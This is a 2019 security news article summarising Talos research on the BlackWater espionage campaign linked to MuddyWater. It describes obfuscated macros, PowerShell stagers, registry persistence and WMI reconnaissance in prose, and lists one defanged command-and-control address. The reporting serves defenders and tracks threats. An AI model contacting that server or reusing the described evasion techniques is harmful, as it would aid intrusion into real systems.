BlackWater Campaign Linked to MuddyWater Cyberspies

Tuesday, May 21, 2019

Ionut Arghire

Fa42af438e58b799189dd26386f5870f

A recently discovered campaign shows that the cyber-espionage group MuddyWater has updated tactics, techniques and procedures (TTPs) to evade detection, Talos’ security researchers report. 

MuddyWater was first detailed in 2017 and has been highly active throughout 2018. The cyber-spies have been focused mainly on governmental and telco targets in the Middle East (Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon) and nearby regions (Azerbaijan, Pakistan and Afghanistan).

The recently observed campaign, which Talos calls BlackWater, aims to install a PowerShell-based backdoor onto the victim’s machine, for remote access. Analyzed samples show that, while the actor made changes to bypass security controls, the underlying code was unchanged. 

Observed modifications include the use of an obfuscated VBA script to establish persistence as a registry key and trigger a PowerShell stager. The stager would connect to the attacker’s server to obtain a component of the open-source FruityC2 agent script to further enumerate the host machine. 

The gathered data is then sent to a different command and control (C&C) server, in the URL field, in another attempt to make host-based detection more difficult. Moreover, recent samples show that the actor aimed to replace some variable strings, likely in an attempt to avoid signature-based detection. 

MuddyWater-associated samples observed in the February - March timeframe revealed that, after achieving persistence, the actor used PowerShell commands for reconnaissance. The samples also contained the IP address of the C&C server. 

These components were found in a Trojanized attachment sent to the victim, which allowed security researcher to easily analyze the attacks by obtaining a copy of the document. 

Activity observed in April, however, “would require a multi-step investigative approach,” Talos noted. A malicious document used last month and believed to be associated with MuddyWater contained a password-protected and obfuscated macro titled "BlackWater.bas". 

The macro contains a PowerShell script to persist in the "Run" registry key, and call the file “SysTextEnc.ini” every 300 seconds. The clear text version of the file, the security researchers say, appears to be a lightweight stager.

The stager would connect to a C&C server at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt, Talos says, closely resembles a PowerShell agent previously used by the group. It only shows small changes, likely made to avoid detection. 

PowerShell commands derived from FruityC2 were then used to call Windows Management Instrumentation (WMI) and gather system information such as operating system name, OS architecture, operating system’s caption, domain and username, and the machine’s public IP address. 

The only command that did not call WMI would attempt to obtain the security system’s MD5 hash, which was likely used to uniquely identify the machine in case multiple workstations were compromised within the same network. 

“Despite last month's report on aspects of the MuddyWater campaign, the group is undeterred and continues to perform operations. Based on these observations, as well as MuddyWater's history of targeting Turkey-based entities, we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group,” Talos concludes. 

Related: Kaspersky Analyzes Hacking Group's Homegrown Attack Tools

Related: Highly Active MuddyWater Hackers Hit 30 Organizations in 2 Months

 

33522
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.